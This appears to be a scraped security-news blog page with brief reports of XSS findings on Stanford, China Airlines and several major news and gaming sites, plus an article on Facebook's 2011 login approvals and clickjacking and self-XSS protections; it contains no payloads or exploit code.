Vulnerability in Standford University & China-airlines Website found by Minhal Mehdi. He found XSS Vulnerablity Found in China-airline's website and Multiple vulnerabilities Found in Standford University's website. 


Standford University:-





China-Airlines:-


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Facebook Rolls Out Login Approvals and Security Protections Against Clickjacking and Self-XSS

Posted by Avik Sarkar On 5/14/2011 12:04:00 am


Facebook has released several new security features designed to thwart unauthorized logins, cross-site scripting, and clickjacking that trick users into sharing spam to the news feed. Login approvals require suspicious logins to be confirmed with a code texted to a user’s phone, while self-XSS and clickjacking protection  warns users and requires them to confirm their actions when pasting links into their browser or clicking suspicious Like buttons.
These protections should reduce the prevalence of hijacked accounts and highly visible spam in the news feed that perpetuate the public perception of Facebook as less safe than the rest of the internet.



Facebook’s latest internal security efforts were announced alongside a new partnership with Web of Trust, a a crowd-sourced website reputation rating service that will be used to power alerts to Facebook users when they click malicious outbound links. Facebook has previously concentrated on improving security through user education and login protection features such as remote session logout and one-time passwords.

Login Approvals

Now Facebook is rolling out the two-factor authentication it announced last month. Users can visit Account -> Account Settings -> Settings -> Account Security to enable the feature, which will require them to verify their phone number. Once enabled, any time someone attempts to login to the account through a new or unrecognized device, they’ll have to enter a code sent to their phone via SMS. Users will also be notified the next time the successfully login of any suspicious attempts thwarted by the login approvals feature.



Users could be temporarily locked out of their account if they have Login Approvals in the unlikely event that both their phone and their approved Facebook login device were lost or stolen. Still, the feature offers a strong additional layer of security for those who opt in to it. It can also serve to protect users who may share their password with a loved one for use on their regular login device, but who don’t want those people to access their account from elsewhere.

Clickjacking Protection

Clickjacking refers to when a malicious website conceals an active link beneath an image or other disguise to fool a user into clicking a link they didn’t intend to. In the case of Facebook, malicious sites sometimes conceal Like buttons beneath video players or appealing offers, leading users to inadvertently share the spam site to the news feed, drawing in more users to the scam.
Facebook already has automated systems designed to identify and disable uses of the Like button for clickjack, as well as block or remove outbound links to clickjacking sites. Now Facebook as added additional protection against the tactic by requiring users to confirm they wanted to click a Like button that is suspected to be part of a clickjacking scheme. The Like won’t go through and stories won’t be published to the news feed unless the user confirms.
This feature could cut down on one of the most prominent Facebook security threats as of late, which has spread through links that promise videos of racy or gruesome content.

Self-XSS Protection

Self-cross site scripting is a security threat in which a spam news feed story, wall posts, or Message asks users to copy malicious code into their browser, thereby causing a hacker’s message to be posted to additional friends. These threats are becoming increasingly sophisticated over the years (if you want to get deeper into the topic, be sure to check out security researcher Joey Tyson’s Social Hacking blog).
The new security features detects when users attempt to paste malicious code into their browser, displays an alert explaining why the practice of copying code into a browser is dangerous, and prevents the code from being run.


By mixing education in with technical security features, Facebook can protect users now and teach them to protect themselves in the future.


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Huffingtonpost, EA, IGN, NYTimes & Many Other High Profile Sites Are Vulnerable Said "TeamHav0k"

Posted by Avik Sarkar On 1/21/2012 03:57:00 pm

Huffingtonpost, EA, IGN, NYTimes & Many Other High Profile Sites Are Vulnerable Said "TeamHav0k"
 A new hacker group which was most probably  formed in the last year named "TeamHav0k" has been working throughout last week and this week in attempts to find XSS vulnerability in many high profile sites, they have called this "#OP XSS".  In a pastebin, they have released all their finds over the past week. Among them  the most notable find are in the websites of the CERN, NYTimes, Dr.pepper, The Huffington Post, EA, IGN, Images Hack, Verizon and so on.  All their finds for #OP XSS can be found on the pastebin release.




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search